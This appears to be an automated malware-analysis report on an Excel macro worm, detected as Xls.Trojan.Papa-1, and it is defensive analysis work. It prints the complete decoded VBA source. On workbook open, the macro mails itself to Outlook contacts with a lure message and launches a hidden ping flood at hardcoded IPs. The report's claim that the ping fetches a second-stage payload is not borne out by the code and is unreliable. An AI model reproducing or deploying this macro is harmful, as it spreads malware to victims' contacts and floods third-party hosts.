Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa0aed48b7309062…

MALICIOUS

Office (OLE)

16.5 KB Created: 1999-03-29 04:34:30 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 8c8947536b4f77fec8c8378ee007bda1 SHA-1: ce9406ab0754ee37b126db8c13c7d375900f81df SHA-256: fa0aed48b730906276ba4753aba27d93b973fa30697fc0c98d980e93627e9c69
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1041 Exfiltration Over C2 Link T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a Workbook_Open macro that uses CreateObject to interact with Outlook, sending copies of the workbook to the victim's contacts. It also uses the Shell() function to execute a ping command, which likely serves to download and execute a second-stage payload from one of the hardcoded IP addresses. The macro's intent is to spread itself and download further malicious content.

Heuristics 6

  • ClamAV: Xls.Trojan.Papa-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Papa-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4469 bytes
SHA-256: e5131945628f13103b106973c21dbcc475e2fc3b2d82da4b3e70f0b4371b10f2
Detection
ClamAV: Xls.Trojan.Papa-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
Application.EnableCancelKey = 0
Randomize
Set oa = CreateObject("Outlook.Application")
Set mn = oa.GetNameSpace("MAPI")
If oa = "Outlook" Then
mn.Logon "profile", "password"
For y = 1 To mn.AddressLists.Count
x = 1
Set ab = mn.AddressLists(y)
Set papaver = oa.CreateItem(0)
For z = 1 To ab.AddressEntries.Count
vi = ab.AddressEntries(x)
papaver.Recipients.Add vi
x = x + 1
If x > 60 Then z = ab.AddressEntries.Count
Next z
papaver.Subject = "Fwd: Workbook from all.net and Fred Cohen"
papaver.Body = "Urgent info inside.  Disregard macro warning."
papaver.Attachments.Add ActiveWorkbook.FullName
papaver.Send
vi = ""
Next y
mn.Logoff
q = Int(6 * Rnd)
If q = 2 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 207.222.214.225", vbHide
ElseIf q = 4 Then
Shell "ping -t -l" & Str(Int(60000 * Rnd)) & " -w 1 24.1.84.100", vbHide
End If
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/2570a02638fb43cba9d15893eeafe231.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 2885 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' 	SetStmt 
' 	LitStr 0x0013 "Outlook.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set oa 
' Line #5:
' 	SetStmt 
' 	LitStr 0x0004 "MAPI"
' 	Ld oa 
' 	ArgsMemLd GetNameSpace 0x0001 
' 	Set mn 
' Line #6:
' 	Ld oa 
' 	LitStr 0x0007 "Outlook"
' 	Eq 
' 	IfBlock 
' Line #7:
' 	LitStr 0x0007 "profile"
' 	LitStr 0x0008 "password"
' 	Ld mn 
' 	ArgsMemCall Logon 0x0002 
' Line #8:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld mn 
' 	MemLd AddressLists 
' 	MemLd Count 
' 	For 
' Line #9:
' 	LitDI2 0x0001 
' 	St x 
' Line #10:
' 	SetStmt 
' 	Ld y 
' 	Ld mn 
' 	ArgsMemLd AddressLists 0x0001 
' 	Set ab 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0000 
' 	Ld oa 
' 	ArgsMemLd CreateItem 0x0001 
' 	Set papaver 
' Line #12:
' 	StartForVariable 
' 	Ld z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ab 
' 	MemLd AddressEntries 
' 	MemLd Count 
' 	For 
' Line #13:
' 	Ld x 
' 	Ld ab 
' 	ArgsMemLd AddressEntries 0x0001 
' 	St vi 
' Line #14:
' 	Ld vi 
' 	Ld papaver 
' 	MemLd Recipients 
' 	ArgsMemCall Add 0x0001 
' Line #15:
' 	Ld x 
' 	LitDI2 0x0001 
' 	Add 
' 	St x 
' Line #16:
' 	Ld x 
' 	LitDI2 0x003C 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	Ld ab 
' 	MemLd AddressEntries 
' 	MemLd Count 
' 	St z 
' 	EndIf 
' Line #17:
' 	StartForVariable 
' 	Ld z 
' 	EndForVariable 
' 	NextVar 
' Line #18:
' 	LitStr 0x0029 "Fwd: Workbook from all.net and Fred Cohen"
' 	Ld papaver 
' 	MemSt Subject 
' Line #19:
' 	LitStr 0x002D "Urgent info inside.  Disregard macro warning."
' 	Ld papaver 
' 	MemSt Body 
' Line #20:
' 	Ld ActiveWorkbook 
' 	MemLd FullName 
' 	Ld papaver 
' 	MemLd Attachments 
' 	ArgsMemCall Add 0x0001 
' Line #21:
' 	Ld papaver 
' 	ArgsMemCall Send 0x0000 
' Line #22:
' 	LitStr 0x0000 ""
' 	St vi 
' Line #23:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' 	Ld mn 
' 	ArgsMemCall Logoff 0x0000 
' Line #25:
' 	LitDI2 0x0006 
' 	Ld Rnd 
' 	Mul 
' 	FnInt 
' 	St q 
' Line #26:
' 	Ld q 
' 	LitDI2 0x0002 
' 	Eq 
' 	IfBlock 
' Line #27:
' 	LitStr 0x000A "ping -t -l"
' 	LitDI4 0xEA60 0x0000 
' 	Ld Rnd 
' 	Mul 
' 	FnInt 
' 	ArgsLd Str 0x0001 
' 	Concat 
' 	LitStr 0x0015 " -w 1 207.222.214.225"
' 	Concat 
' 	Ld vbHide 
' 	ArgsCall Shell 0x0002 
... (truncated)